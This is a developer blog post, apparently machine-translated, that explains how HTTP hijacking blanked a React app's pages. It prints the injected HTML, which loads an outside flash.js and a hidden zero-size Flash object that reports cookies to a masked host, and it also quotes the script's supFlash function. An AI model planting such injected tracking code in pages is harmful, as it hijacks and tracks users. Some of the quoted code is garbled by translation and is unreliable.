This is the 8th day of my participation in Gwen Challenge

Problem analysis

Some time ago, the company launched a React development project. Testing colleagues found that the page would occasionally appear blank when refreshed multiple times.

The figure above is a comparison of the normal case and the abnormal case. We will see that in the abnormal case our page will load and go through the following steps

  1. v2.html
  2. flash.js
  3. v2.html

In the exception case, the first v2.html request is hijacked and returns the following data:

<html>
  <head>
    <script language="javascript">
      setTimeout('location.replace(location.href.split("#")[0])'.2000)
    </script>
    <script
      type="text/javascript"
      src="http://xxxx:89/cookie/flash.js"
    ></script>
    <script language="javascript">
      // 
      setURL('xxxx')
      supFlash('xxxx')
    </script>
  </head>
  <body>
    <object
      classid="clsid:d27cdb6e-ae6d-11cf-96b8-444553540000"
      codebase="Http://fpdownload.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=7, 0, 0,"
      width="0"
      height="0"
      id="m"
      align="center"
      ><param name="allowScriptAccess" value="always" />
      <param name="movie" value="http://xxxx:89/cookie/flashcookie.swf" />
      <param name="quality" value="high" />
      <param name="FlashVars" value="srv=xxxx" />
      <embed
        src="http://xxxx:89/cookie/flashcookie.swf"
        FlashVars="srv=xxxx"
        quality="high"
        width="0"
        height="0"
        name="m"
        align="center"
        allowScriptAccess="always"
        type="application/x-shockwave-flash"
        pluginspage="http://www.macromedia.com/go/getflashplayer"
      />
    </object>
  </body>
</html>
Copy the code

The XXXX above is used to shield sensitive information

SetTimeout (‘location.replace(location.hre.split (“#”)[0])’, 2000). This clears the Hash argument from the URL. In addition, cookie/flash.js defines the loadPage function, which also clears the Hash parameter on the URL.

function loadPage () {
  location.replace(location.href.split(The '#') [0])}Copy the code

This causes the HashRouter path of the React-Router route to be cleared.

cookie/flash.js

Click here to view cookie/flash.js full source code

function supFlash (cookie) {
  if (false === IsCanReport2Ac()) {
    loadPage()
    return
  }

  // Get the local cookie value
  var td_cookie = getCookie('td_cookie')
  if (td_cookie == cookie) {
    loadPage()
    return
  }
  setCookie('td_cookie', cookie)

  var flash = 0
  varjudgeIE = ! - [1]
  var ua = navigator.userAgent.toLowerCase()
  if (ua.indexOf('taobrowser') > 0 || ua.indexOf('lbbrowser') > 0) {
    loadPage()
    return
  }
  var isIE = judgeIE || ua.indexOf('msie') > 0 || ua.indexOf('trident / 7.0') > 0
  if (isIE) {
    try {
      var swf1 = new ActiveXObject('ShockwaveFlash.ShockwaveFlash')
      flash = 1
    } catch (e) {
      flash = 0}}else {
    try {
      var swf2 = navigator.plugins['Shockwave Flash']
      if (swf2 == undefined) {
        flash = 0
      } else {
        flash = 1}}catch (e) {
      flash = 0}}if (flash === 0) {
    loadPage()
    return}}Copy the code

Cookie /flash.js calls the above supFlash function to report cookie information via Flash, but what it does is unknown.

Unexpected HTTP hijacking not only affects page presentation, but also compromises the security of the service. So how do we solve this problem? Using Https to encrypt packets and prevent man-in-the-middle attacks should be a good solution.

The resources

  • Deep convincing hijacking HTTP anti – jump
  • Network has been hijacked total to request http://10.19.99.18:89/cookie/flash.js caton 2 s how to solve
  • Campus network randomly hijacked web pages, to see what it is!